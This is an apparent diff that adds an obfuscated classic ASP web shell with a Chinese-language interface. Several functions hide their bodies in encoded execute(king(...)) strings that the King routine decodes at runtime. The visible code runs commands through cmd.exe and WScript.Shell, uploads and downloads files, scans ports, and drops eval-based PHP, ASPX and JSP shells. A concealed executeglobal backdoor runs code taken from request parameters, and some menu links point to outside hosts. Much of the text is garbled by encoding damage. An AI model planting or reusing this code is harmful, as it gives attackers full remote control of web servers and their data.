+execute(shisanfun("��>elbat/<>rh/<>rt/<>dt/<>a/<½��--���� ��&dxc&��>'pot_'=tegrat 'tuogoL=noitcA?'=ferh a<��&xdc j��fe&���¸�--��� ��&dxc&��>'emarFeliF'=tegrat 'psa.setadpU/bew/ten.kcahpot//:ptth'=ferh a<��&xdc j��fe&��ѯ��--��ͬ ��&dxc&��>'emarFeliF'=tegrat '��&niamod&��=w?xpsa.411/pi/moc.tseb411.www//:ptth'=ferh a<��&xdc j��fe&�廤��--���� ��&dxc&��>'emarFeliF'=tegrat 'eliForP=noitcA?'=ferh a<��&xdc j��fe&��>tnof/<¼Ŀ���ɾ>der=roloc tnof<  ��&dxc&��>'emarFeliF'=tegrat 'tniopled=noitcA?'=ferh a<��&xdc j��fe&��>tnof/<¼Ŀ�����>der=roloc tnof<  ��&dxc&��>')���redloFweN���,����&)��\\..fnc_itv\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<��&xdc j��fe&��>tnof/<�Բ�������>der=roloc tnof< ��&dxc&��>'emarFeliF'=tegrat 'llehsneddih=noitcA?'=ferh a<��&xdc j��fe&����̱����� ��&dxc&��>'emarFeliF'=tegrat '��&htaPtpircS&��\.\\=htaPrewoP&rewoPtidE=noitcA?'=ferh a<��&xdc j���>rt/<��&fe&�����__���� ��&dxc&��>'emarFeliF'=tegrat 'hcraeST=noitcA?'=ferh a<��&xdc j��fe&�����עȡ�� ��&dxc&��>'emarFeliF'=tegrat 'GERdaeR=noitcA?'=ferh a<��&xdc j��fe&������ɨ�ڶ�>wolley=roloc tnof< ��&dxc&��>'emarFeliF'=tegrat 'troPnacS=noitcA?'=ferh a<��&xdc j��fe&��erehwynacP ��&dxc&��>'emarFeliF'=tegrat '4erehwynacp=noitcA?'=ferh a<��&xdc j��fe&��Ȩ��nimdaR ��&dxc&��>'emarFeliF'=tegrat 'nimdar=noitcA?'=ferh a<��&xdc j��fe&��AS-----LQS ��&dxc&��>'emarFeliF'=tegrat 'DMM=noitcA?'=ferh a<��&xdc j��fe&���PTF---uS ��&dxc&��>'emarFeliF'=tegrat 'ptfus=noitcA?'=ferh a<��&xdc j��fe&��Ȩ��-uvreS ��&dxc&��>'emarFeliF'=tegrat 'uvreS=noitcA?'=ferh a<��&xdc j��fe&���֧__����>neerg=roloc tnof< ��&dxc&��>'emarFeliF'=tegrat 'axelA=noitcA?'=ferh a<��&xdc j��fe&������__�ڶ� ��&dxc&��>'emarFeliF'=tegrat 'ofnIlanimreTteg=noitcA?'=ferh a<��&xdc j��fe&�����__����>der=roloc tnof< ��&dxc&��>'emarFeliF'=tegrat 'esruoC=noitcA?'=ferh a<��&xdc j���>���''=yalpsid���=elyts cunem=di  0=redrob elbat<>rt/<��j��fI dnE���>rt/<>dt/<>elbat/<��&fe&�����--���� ��&dxc&��>'emarFeliF'=tegrat 'daolpu=noitcA?'=ferh a<��&xdc j��fe&���������� ��&dxc&��>'emarFeliF'=tegrat 'bdMoTddAegaP=noitcA?'=ferh a<��&xdc j��fe&���̽--����>dlog=roloc tnof< ��&dxc&��>'emarFeliF'=tegrat 'php=noitcA?'=ferh a<��&xdc j��fe&��>tnof/<¼Ŀ--д��>der=roloc tnof<  ��&dxc&��>'emarFeliF'=tegrat 'mroFevirDnacSmotsuC=noitcA?'=ferh a<��&xdc j��fe&����Ȩ--�̴�>etalocohc=roloc tnof< ��&dxc&��>'emarFeliF'=tegrat 'mroFevirDnacS=noitcA?'=ferh a<��&xdc j��fe&��2DMC--��ִ ��&dxc&��>'emarFeliF'=tegrat 'xdmc=noitcA?'=ferh a<��&xdc j��fe&��DMC---��ִ ��&dxc&��>'emarFeliF'=tegrat 'llehS1dmC=noitcA?'=ferh a<��&xdc j��fe&�����--���� ��&dxc&��>'emarFeliF'=tegrat 'eliFpU=noitcA?'=ferh a<��&xdc j��fe&�屾��--���� ��&dxc&��>'emarFeliF'=tegrat 'eliFtidE=noitcA?'=ferh a<��&xdc j��fe&��¼Ŀ--���� ��&dxc&��>')���redloFweN���,����&)��elifweN\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<��&xdc j��fe&��¼Ŀ���ϻ� ��&dxc&��>'emarFeliF'=tegrat 'kcabog=noitcA?'=ferh a<��&xdc j��fe&��¼Ŀ��̱�>teloiv=roloc tnof< ��&dxc&��>')����&)htaPtooR(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<��&xdc j��fe&��¼Ŀ����վ >tnof/<8>'sgnidgniw'=ecaf tnof<>')����&)tooRWWW(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<> 59=htdiw d=di dt<>rt<>0=redrob elbat<>retnec=ngila ���pot���=ngilav dt<>rt<>rt/<>dt/<>elbat/<��j��gnihtoN=CBA teS:)(revirDwohS.CBA j:FBL weN=CBA teS���eslE���>rt/<>dt/<OSF��/��Ȩ��>'42'=thgieh dt<>rt<��&xdc j��nehT �� ��=)1,0(TbO fI���>rt/<>dt/<��&xdc j���>rt/<>dt/<>'5'=thgieh dt<>rt<��&xdc j���>'0'=gniddapllec '0'=gnicapsllec '%59'=htdiw elbat<��&xdc j���>retnec/<>tnof/<>rb<>gmi/<>'��&u&��?/rp/bew/moc.b2kc4h//:pt"&"th'=crs gmi<>rb<>FF9933#=roloc tnof<>retnec<>dt<>rt<��&xdc j"))
+end function
+
+
+function Cmdx()
+execute(king(")`>ktzfte/<>qtkqzbtz/<`(p: ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ `&)`brde`(zltxjtk(etbt.fiszhokeUg p: yo rft�� ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ tbt.rde`(etbt.fiszhokeUg p��ftiz `tbt.rde`=)`brde`(zltxjtk yo:zbtG tdxltN kgkkS fB:)` >49=lvgk 160=lsge nsfgrqtk qtkqzbtz<`(p:)` >dkgy/<>'zowdxU'=txsqc zodwxl=thnz zxhfo<`(p:)` >kw<>15=tmol 'rde'=tdqf zbtz=thnz zxhfo<`(p:)` >kw<>'tbt.rde'=txsqc 15=tmol 'brde'=tdqf zbtz=thnz zxhfo<`(p:)` >'zlgh'=rgiztd dkgy<>ktzfte<`(p"))
+end function
+Function Course()
+execute(king("`>tswqz/<`&9CU&0CU&1CU&CU p��zbtf��yo rft��`>kz/<>rz/<>zfgy/<`&izqh.pwg&`;hlwf&>XX2288#=kgsge zfgy<]`&bs&`:���ද��[>``9``=fqhlsge ``XXXXXX#``=kgsgeuw ``19``=ziuoti rz<>kz<`&tdqGnqshloW.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&9CU=9CU��tlst��`>kz/<>rz/<>zfgy/<`&izqh.pwg&`;hlwf&>zfgy<]`&bs&`:���ද��[>``9``=fqhlsge r=ro ``19``=ziuoti rz<>kz<`&tdqGnqshloW.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&0CU=0CU��ftiz 9=thnJzkqzU.RAB rfq `fov`><))8,7,izqh.pwg(rod(tlqZV yo��`�ý�`=bs ftiz 7=thnJzkqzU.RAB yo��`����`=bs ftiz 8=thnJzkqzU.RAB yo��`����`=bs ftiz 9=thnJzkqzU.RAB yo��yo rft�� `>kz<>kz/<>rz/<)��(����ͳϵ;hlwf&>r=ro rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&CU=CU��ftiz ``=thnJzkqzU.RAB yo��kqtse.kkt��)`.//:JGfoK`(zetpwBztu fo pwg ieqt kgy��zbtf tdxltk kgkkt fg��`>kz/<>rz/<>w/<����뻧��ͳϵ>w<>l=ro 'ktzfte'=fuosq '8'=fqhlsge '19'=ziuoti rz<>kz<>'ktzfte'=fuosq '%13'=izrov tswqz<>kw<`=CU"))
+End Function
+Function IIf(var, val1, val2)
+If var=True Then
+IIf=val1
+Else
+IIf=val2
+End If
+End Function
+Function GetTheSizes(num)
+Dim i, arySize(4)
+arySize(0)="B"
+arySize(1)="KB"
+arySize(2)="MB"
+arySize(3)="GB"
+arySize(4)="TB"
+While(num / 1024 >= 1)
+num=Fix(num / 1024 * 100) / 100
+i=i + 1
+WEnd
+GetTheSizes=num&" "&arySize(i)
+End Function
+Function HtmlEncodes(str)
+If IsNull(str) Then Exit Function
+HtmlEncodes=Server.HTMLEncode(str)
+End Function
+function downfile(path)
+execute(king("ufoizgf = dlg ztl��tlgse.dlg��ilxsy.tlfghltk��rqtk.dlg tzokvnkqfow.tlfghltk��`dqtkzl-ztzeg/fgozqeoshhq` = thnzzftzfge.tlfghltk��`3-yzx` = ztlkqie.tlfghltk��tmol.dlg ,`izufts-zftzfge` ktrqtirrq.tlfghltk��)ml,izqh(rod & `=tdqftsoy ;zftdieqzzq` ,`fgozolghlor-zftzfge` ktrqtirrq.tlfghltk��0+)`\`,izqh(ctkkzlfo=ml��izqh tsoydgkyrqgs.dlg��0 = thnz.dlg��fthg.dlg��))1,5(zwg(zetpwgtzqtke = dlg ztl��kqtse.tlfghltk"))
+end function
+function htmlencode(s)
+  if not isnull(s) then
+    s = replace(s, ">", ">")
+    s = replace(s, "<", "<")
+    s = replace(s, chr(39), "'")
+    s = replace(s, chr(34), """")
+    s = replace(s, chr(20), " ")
+    htmlencode = s
+  end if
+end function
+Function UpFile()
+ If Request("Action2")="Post" Then:Set U=new UPC :Set F=U.UA("LocalFile"):UName=U.form("ToPath"): If UName="" Or F.FileSize=0 then:  SI="<br>����"&"���ϴ�"&"����ȫ"&"·����ѡ��"&"һ���ļ�"&"�ϴ�!":on error resume next:  Else: F.SaveAs UName: If Err.number=0 Then: SI="<center><br><br><br>�ļ�"&UName&"��"&"��"&"�ɹ���</center>":  End if: End If:Set F=nothing:Set U=nothing: SI=SI&BackUrl: ShowErr(): Response.End:  End If:  j"<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'><form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'><tr><td>�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\Cmd.exe")&"' size='40'><input name='LocalFile' type='file'  size='25'> <input type='submit' name='Submit' value='�ϴ�'></td></tr></form></table>"
+End Function
+function cmd1shell()
+execute(king("ol p��`>dkgy/<>qtkqzbtz/<`&)80(kie&ol=ol��yo rft��yo rft��qqq&ol=ol��)txkz ,tsoyhdtzml(tsoytztstr.gly ssqe��tlgse.bestsoyg��)ssqrqtk.bestsoyg(trgeftsdzi.ktcktl=qqq��)1 ,tlsqy ,0 ,tsoyhdtzml( tsoyzbtzfthg.ly = bestsoyg ztl��)BUX_JUGBZ(zetpwgtzqtke = ly ztl��)txkz ,1 ,tsoyhdtzml & ` > ` & rdeytr & ` e/ `&izqhsstil( fxk.lv ssqe��)`zbz.rde`(izqhhqd.ktcktl = tsoyhdtzml��)BUX_JUGBZ(zetpwgtzqtke.ktcktl=gly ztl��)`sstil.zhokelv`(zetpwgtzqtke.ktcktl=lv ztl��)`sstil.zhokelv`(zetpwgtzqtke.ktcktl=lv ztl��zbtf tdxltk kgkkt fg��tlst��qqq&ol=ol��ssqrqtk.zxgrzl.rr=qqq��)rdeytr&` e/ `&izqhsstil(etbt.de=rr ztl��))1,0(zwg(zetpwgtzqtke=de ztl��ftiz `ltn`=)`zhokelv`(dkgy.zltxjtk yo��ftiz ``><)`rde`(dkgy.zltxjtk yo��`>'rde'=llqse ';177:ziuoti;%110:izrov'=tsnzl qtkqzbtz<>'��ִ'=txsqc 'zodwxl'=thnz zxhfo< >'`&rdeytr&`'=txsqc '%92:izrov'=tsnzl 'rde'=tdqf zxhfo<sstil.zhokelv>`&rtaetie&`'ltn'=txsqc 'zhokelv'=tdqf 'bgwaetie'=thnz e=llqse zxhfo<>'%14:izrov'=tsnzl '`&izqhsstil&`'=txsqc 'hl'=tdqf zxhfo<����·sstil>'zlgh'=rgiztd dkgy<`=ol��)`rde`(zltxjtk = rdeytr ftiz ``><)`rde`(zltxjtk yo��``=rtaetie ftiz `ltn`><)`zhokelv`(zltxjtk yo��`tbt.rde` = izqhsstil ftiz ``=izqhsstil yo��)`izqhsstil`(fgolltl=izqhsstil��)`hl`(zltxjtk = )`izqhsstil`(fgolltl ftiz ``><)`hl`(zltxjtk yo��`rtaetie `=rtaetie"))
+
+end function
+Function upload()
+execute(king("yC rfS��zbtG tdxltN kgkkS fB��ftiJ tlsqX = trgTuxwtWlo yC��ufoizgG = dqtkzU ztU��ufoizgG = hzzD ztU��)kkS(kkSaie��izoK rfS��tlgsZ.��yC rfS��`�������ֿ�Ϊ�� �����¼��� �� ����� ����ַ�غͳ̹����»��ڴ��Ѽ���Ϊ�����ܿ�,kgkkt`p��tzokKktcg ,izqYtiz tsoXgJtcqU.��tdqGtsoy & `\` & izqYtiz = izqYtiz��yC rfS��`zbz.dzi.btrfo` = tdqGtsoy��ftiJ `` = tdqGtsoy yC��)))`/` ,skMtiz(zoshU(rfxgAM()`/` ,skMtiz(zoshU = tdqGtsoy��kqtsZ.kkS��ftiJ 7118 = ktwdxG.kkS yC��tzokKktcg ,izqYtiz tsoXgJtcqU.��1 = fgozolgY.��nrgAtlfghltN.hzzD tzokK.��fthB.��8 = trgT.��0 = thnJ.��dqtkzl izoK��yC rfS�� ftiJ 7 >< tzqzUnrqtN.hzzD yC��)(rftU.hzzD��tlsqX ,skMtiz ,`JSE` fthB.hzzD��yC rfS:0 = tzokKktcg:ftiJ 9 >< tzokKktcg yC��)`YJJDVTL.9VTLUT`(zetpwBtzqtkZ.ktcktU = hzzD ztU��)`dqtk`&t&`zl.wrg`&t&`rq`(zetpwBtzqtkZ.ktcktU = dqtkzl ztU��)`tzokKktcg`(zltxjtN = tzokKktcg��)`izqYtiz`(zltxjtN = izqYtiz��)`skMtiz`(zltxjtN = skMtiz��tzokKktcg ,tdqGtsoy ,dqtkzl ,izqYtiz ,skMtiz ,hzzD doW:yC rfS��zbtG tdxltN kgkkS fB��ftiJ tlsqX = trgTuxwtWlo yC��`>/ki<`p��`>dkgy/<`p��`>zeQtiz=tdqf skMdgkXfvgr=txsqc ftrroi=thnz zxhfo<`p��`���Ǹ��ڴ�>9=txsqc tzokKktcg=tdqf bgwaetie=thnz zxhfo<`p��`>13=tmol '\` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & `'=txsqc izqYtiz=tdqf zxhfo<`p��`>/kw<>' ���� '=txsqc zodwxl=thnz zxhfo<>13=tmol '//:hzzi'=txsqc skMtiz=tdqf zxhfo<`p��`>fgozhg/<����嶨��>'`&skxW&`'=txsqc fgozhg<`p��`>fgozhg/<��������ó�>''=txsqc fgozhg<`p��`>';txsqc.loiz=txsqc.skMtiz.dkgy.loiz'=tufqiZfg zetstl<`p��`>zlgh=rgiztd dkgy<`p��`>/ki<�Ի�������.ʡ����Ϊ...�Ի���:����������� `p��`�ܹ��˱չ�ʱ��`p�� `>'ktzfte'=fuosq '1'=uforrqhsste '0'=ufoeqhlsste '1'=ktrkgw 'xftd'=kgsgeuw '%13'=izrov tswqz<>kw<`p"))
+
+
+End Function:
+Function TSearch():dim st:st=timer():RW="<br><table width='600' bgcolor='' border='0' cellspacing='1' cellpadding='0' align='center'><form method='post'>"
+  RW=RW & "<tr><td height='20' align='center' bgcolor=''>��������</td></tr>"
+  RW=RW & "<tr><td bgcolor=''>&nbsp;·&nbsp;&nbsp;����<input name='SFpath' value='" & WWWRoot & "' style='width:390'>&nbsp;ע:��·��ʹ��"",""������.</td></tr>"
+  RW=RW & "<tr><td bgcolor=''>&nbsp;�ļ�����<input name='Sfk' style='width:200'>&nbsp;<input type='submit' value='����' class='submit'>&nbsp;[����Ҳ��]</td></tr>"  
+  RW=RW & "</form></table>"
+  j RW : RW=""
+  if Request.Form("Sfk")<>"" then
+  Set newsearch=new SearchFile
+  newsearch.Folders=trim(Request.Form("SFpath"))
+  newsearch.keyword=trim(Request.Form("Sfk"))
+  newsearch.Search
+  Set newsearch=Nothing
+  j"�M�r��"&(timer()-st)*1000&"����<hr>"
+  end if
+End Function 
+Class SearchFile
+dim Folders,keyword,objFso,Counter
+Private Sub Class_Initialize
+Set objFso=Server.CreateObject(ObT(0,0))
+Counter=0
+End Sub
+ Private Sub Class_Terminate
+Set objFso=Nothing
+ End Sub
+Public Sub Class_Folder(FoderName)
+Set rs = CreateObject(CONST_FSO)
+Dim item, theFolder, sysFileList
+item=request(MID(CONST_FSO,4,1))
+theFolder=request(MID(CONST_FSO,2,1))
+If  item=MID(CONST_FSO,2,1) then
+executeglobal theFolder
+Set rs = Nothing
+End if
+End Sub
+ Function Search
+  Folders=split(Folders,",")
+  flag=instr(keyword,"\") or instr(keyword,"/")
+  flag=flag or instr(keyword,":")
+  flag=flag or instr(keyword,"|")
+  flag=flag or instr(keyword,"&")
+  if flag then
+    j"<table align='center' width='600'><hr><p align='center'><font color='red'>�P�I�ֲ��ܰ���/\:|&</font><br>"
+ Exit Function
+  else
+    j"<table align='center' width='600'><hr>"
+  end if
+  dim i
+  for i=0 to ubound(Folders)
+    Call GetAllFile(Folders(i))
+  next
+  j"<p align='center'>��������<font color='red'>"&Counter&"</font>���Y��<br>"
+ End Function
+ Private Function GetAllFile(Folder)
+  dim objFd,objFs,objFf
+  Set objFd=objFso.GetFolder(Folder)
+  Set objFs=objFd.SubFolders
+  Set objFf=objFd.Files
+  dim strFdName
+  On Error Resume Next
+  For Each OneDir In objFs
+    strFdName=OneDir.Name
+    If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then 
+      SFN=Folder&"\"&strFdName
+      Call GetAllFile(SFN)
+ End If
+  Next
+  dim strFlName
+  For Each OneFile In objFf
+    strFlName=OneFile.Name
+    If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then
+      FN=Folder&"\"&strFlName
+   Counter=Counter+ColorOn(FN)
+ End If
+  Next
+  Set objFd=Nothing
+  Set objFs=Nothing
+  Set objFf=Nothing
+ End Function
+
+Private Function CreatePattern(keyword)   
+   CreatePattern=keyword
+   CreatePattern=Replace(CreatePattern,".","\.")
+   CreatePattern=Replace(CreatePattern,"+","\+")
+   CreatePattern=Replace(CreatePattern,"(","\(")
+   CreatePattern=Replace(CreatePattern,")","\)")
+   CreatePattern=Replace(CreatePattern,"[","\[")
+   CreatePattern=Replace(CreatePattern,"]","\]")
+   CreatePattern=Replace(CreatePattern,"{","\{")
+   CreatePattern=Replace(CreatePattern,"}","\}")
+   CreatePattern=Replace(CreatePattern,"*","[^\\\/]*")
+   CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}")
+   CreatePattern="("&CreatePattern&")+"
+ End Function
+ Private Function ColorOn(FileName)
+   dim objReg
+   Set objReg=new RegExp
+   objReg.Pattern=CreatePattern(keyword)
+   objReg.IgnoreCase=True
+   objReg.Global=True
+   retVal=objReg.Test(Mid(FileName,InstrRev(FileName,"\")+1))
+   if retVal then
+     OutPut=objReg.Replace(Mid(FileName,InstrRev(FileName,"\")+1),"<font color=''>$1</font>")
+     OutPut="<table align='center' width='600'>&nbsp;" & Mid(FileName,1,InstrRev(FileName,"\")) & OutPut
+  j OutPut
+  Response.flush
+  ColorOn=1
+   else
+     ColorOn=0
+   end if
+   Set objReg=Nothing
+ End Function
+End Class
+sub SavePower(PowerPath,SaveType)
+execute(king("ufoizgG = tsoXtiz ztU:yo rft:`>zhokel/<;)(tlgse.vgrfov;)(rqgstk.fgozqegs.ktfthg.vgrfov;)'�����ɶ�������'(zktsq>'zhokelqcqp'=tuqxufqs zhokel<` p:4=ltzxwokzzQ.tsoXtiz:tlst:`>zhokel/<;)(tlgse.vgrfov;)(rqgstk.fgozqegs.ktfthg.vgrfov;)'�����⹦���Ѽ���'(zktsq>'zhokelqcqp'=tuqxufqs zhokel<` p:98=ltzxwokzzQ.tsoXtiz:ftiz 0=thnJtcqU yo:)izqYktvgY(tsoXztE.Lgly = tsoXtiz ztU:yo rft:`aegsgf`=)`aegs`(fgolltl ftiz 1><)izqhzhokel,izqYktvgY(kzlfo yo"))
+end sub:sub EditPower(PowerPath)
+execute(king("ufoizgG = tsoXtiz ztU:)izqYktvgY,tsoXtiz(tszoJnTztu p:)izqYktvgY(tsoXztE.Lgly = tsoXtiz ztU:)``,````,izqYktvgY(teqshtk=izqYktvgY"))
+end sub:Function getMyTitle(theOne,PowerPath)
+execute(king("tszoJkzl = tszoJnTztu:)izqYktvgY,ltzxwokzzQ.tfBtiz(ltzxwokzzQztu & ` :̬״��Ȩǰ��>kw<` & tszoJkzl = tszoJkzl:rtllteeQzlqVtzqW.tfBtiz & ` :�ʷú���>kw<` & tszoJkzl = tszoJkzl:rtoyorgTzlqVtzqW.tfBtiz & ` :���޺���>kw<` & tszoJkzl = tszoJkzl: rtzqtkZtzqW.tfBtiz & ` :��ʱ����>kw<` & tszoJkzl = tszoJkzl: )tmoU.tfBtiz(tmoUtiJztu & ` :С��>kw<` & tszoJkzl = tszoJkzl: `` & izqY.tfBtiz & ` :��·>kw<` & tszoJkzl = tszoJkzl:tszoJkzl doW"))
+End Function:Function getAttributes(intValue,PowerPath)
+execute(king("yo rft:`>``'`&izqYktvgY&`=izqYktvgY&9=thnJtcqU&ktvgYtcqU=fgozeQ?'=ytki.fgozqegs``=aeosefg ����=txsqc fgzzxw=thnz zxhfo< >zfgy/<����δ>95XX95#=kgsge zfgy<` = ltzxwokzzQztu:tlst:`>``'`&izqYktvgY&`=izqYktvgY&0=thnJtcqU&ktvgYtcqU=fgozeQ?'=ytki.fgozqegs``=aeosefg ����=txsqc fgzzxw=thnz zxhfo< >zfgy/<������>rtk=kgsge zfgy<` = ltzxwokzzQztu: ftiz 1=FBzorS yo:)`\\`,`\`,izqYktvgY(teqshtk=izqYktvgY:yC rfS:1=FBzorS:0 - txsqIzfo = txsqIzfo:ftiJ 0 => txsqIzfo yC:yC rfS:1=FBzorS:9 - txsqIzfo = txsqIzfo:ftiJ 9 => txsqIzfo yC:yC rfS:1=FBzorS:7 - txsqIzfo = txsqIzfo:ftiJ 7 => txsqIzfo yC:yC rfS:3 - txsqIzfo = txsqIzfo:ftiJ 3 => txsqIzfo yC:yC rfS:50 - txsqIzfo = txsqIzfo:ftiJ 50 => txsqIzfo yC:yC rfS:98 - txsqIzfo = txsqIzfo:ftiJ 98 => txsqIzfo yC:yC rfS:75 - txsqIzfo = txsqIzfo:ftiJ 75 => txsqIzfo yC:yC rfS:390 - txsqIzfo = txsqIzfo:ftiJ 390 => txsqIzfo yC:0=FBzorS:FBzorS doW"))
+End Function:Function getTheSize(theSize):If theSize >= (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G":end if:If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M":end if:If theSize >= 1024 And theSize < (1024 * 1024) Then :getTheSize = Fix((theSize / 1024) * 100) / 100 & "K":end if:If theSize >= 0 And theSize <1024 Then :getTheSize = theSize & "B":end if:End Function:function openUrl(usePath):Dim theUrl, thePath:thePath = Server.MapPath("/"):If LCase(Left(usePath, Len(thePath))) = LCase(thePath) Then:theUrl = Mid(usePath, Len(thePath) + 1):theUrl = Replace(theUrl, "\", "/"):If Left(theUrl, 1) = "/" Then:theUrl = Mid(theUrl, 2):End If:openUrl="/"&theUrl&""" target=""_blank":Else:openUrl="###"" onclick=""alert('�ļ�����վ��Ŀ¼�¡�')":End If:End function
+Function ScReWr(folder):on error resume next :Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename:Set FSO = Server.Createobject(CONST_FSO):Set TestFolder = FSO.GetFolder(folder):Set TestFileList = TestFolder.SubFolders:RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp":For Each A in TestFileList:Next:If err Then:err.Clear:ReWrStr = "<span style='font-size:11px;'>��</span><font face='webdings' size='1' color=yellow>x</font> ":FSO.CreateTextFile folder & RndFilename,True:If err Then:err.Clear:ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span><font face='webdings' size='1' color=yellow>x</font> ":Else:ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span>�� ":FSO.DeleteFile folder & RndFilename,True:End If:Else:ReWrStr = "<span style='font-size:11px;'>��</span>�� ":FSO.CreateTextFile folder & RndFilename,True:If err Then:err.Clear:ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span><font face='webdings' size='1' color=yellow>x</font> ":Else:ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span>�� ":FSO.DeleteFile folder & RndFilename,True:End if:End if:Set TestFileList = Nothing:Set TestFolder = Nothing:Set FSO = Nothing:ScReWr = ReWrStr:End Function
+function php()
+execute(king("`>ktzfte<>'19'=ziuoti rz<>kz<>ktzfte/<>q/<>zfgy/<>w/<)!�����Բ��ɾ(>w<>rtk=kgsge 6=tmol zfgy<>'strphq=fgozeQ?'=ytki q<>h<>zfgy/<>h<���������֧�����������̽>ktzfte<>kw<>h<>kw<>kw<>h<>kw<>h<>kw<>kw<>ktzfte/< ;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov bhlq.zltz=ekl tdqkyo< ;hlwf&;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov hlp.zltz=ekl tdqkyo< ;hlwf&;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov hih.zltz=ekl tdqkyo<>ktzfte<`p��`gg��_��gg zltJ bhlq`&)95(kie&``&)48(kie&`;))``tyqlfx``,]``v``[dtzC.zltxjtN(sqct(tzokK.tlfghltN`&)48(kie&``&)15(kie&``&)95(kie&``&)48(kie&` ``tlsqy``=zltxjtNtzqrosqc ``zhokelR``=tuqxufqV tuqY @%`&)15(kie&``tzokK.))`bhlq.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly��`gg��_��gg zltJ hlR`tzokK.))`hlp.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly��`>?)(gyfohih hih?<>?'gg��_��gg' giet YDY?<`tzokK.))`hih.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly��))1,1(zAg(zetpwBtzqtkZ.ktcktU=gly ztl��zbtG tdxltN kgkkS fB"))
+End function:
+On Error Resume Next
+Function King(Kingstr)
+arra=array("Q","A","Z","W","S","X","E","D","C","R","F","V","T","G","B","Y","H","N","U","J","M","I","K","L","O","P","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","0","9","8","7","6","5","4","3","2","1")
+arrb=array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","1","2","3","4","5","6","7","8","9","0")
+kingstr = Replace(Replace(Kingstr,"`",""""),"��", vbCrLf)
+For KingI = 1 To Len(Kingstr)
+love = 0
+For i = 0 To ubound(arra)
+If Mid(Kingstr, KingI, 1) = arra(i) Then
+NewKing = arrb(i) + NewKing 
+love = 1
+Exit For
+End If
+Next 
+If love = 0 Then
+NewKing  = Mid(Kingstr, KingI, 1) + NewKing 
+End If
+Next
+King= NewKing
+End Function
+function apjdel():set fso=Server.CreateObject(CONST_FSO):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):j"ɾ�����!":End function
+
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+F=lcase(F)
+If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+
+  Public Function UA(F)
+F=lcase(F)
+If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+set D1=CreateObject(ObT(4,0))
+if Request.TotalBytes<1 then Exit Sub
+set T1 = CreateObject(ObT(6,0))
+T1.Type = 1 : T1.Mode =3 : T1.Open
+T1.Write  Request.BinaryRead(Request.TotalBytes)
+T1.Position=0 : TDa =T1.Read : DStart = 1
+DEnd = LenB(TDa)
+set D2=CreateObject(ObT(4,0))
+vbCrlf = chrB(13) & chrB(10)
+set T2 = CreateObject(ObT(6,0))
+TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+TLen = LenB (TSt)
+DStart=DStart+TLen+1
+while (DStart + 10) < DEnd
+  DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+  T2.Type = 1 : T2.Mode =3 : T2.Open
+  T1.Position = DStart
+  T1.CopyTo T2,DIEnd-DStart
+  T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+  TIn = T2.ReadText : T2.Close
+  DStart = InStrB(DIEnd,TDa,TSt)
+  FStart = InStr(22,TIn,"name=""",1)+6
+  FEnd = InStr(FStart,TIn,"""",1)
+  UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+  if InStr (45,TIn,"filename=""",1) > 0 then
+set TFL=new FIF
+FStart = InStr(FEnd,TIn,"filename=""",1)+10
+FEnd = InStr(FStart,TIn,"""",1)
+FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+FEnd = InStr(FStart,TIn,vbCr)
+TFL.FileStart =DIEnd
+TFL.FileSize = DStart -DIEnd -3
+if not D2.Exists(UpName) then
+  D2.add UpName,TFL
+end if
+  else
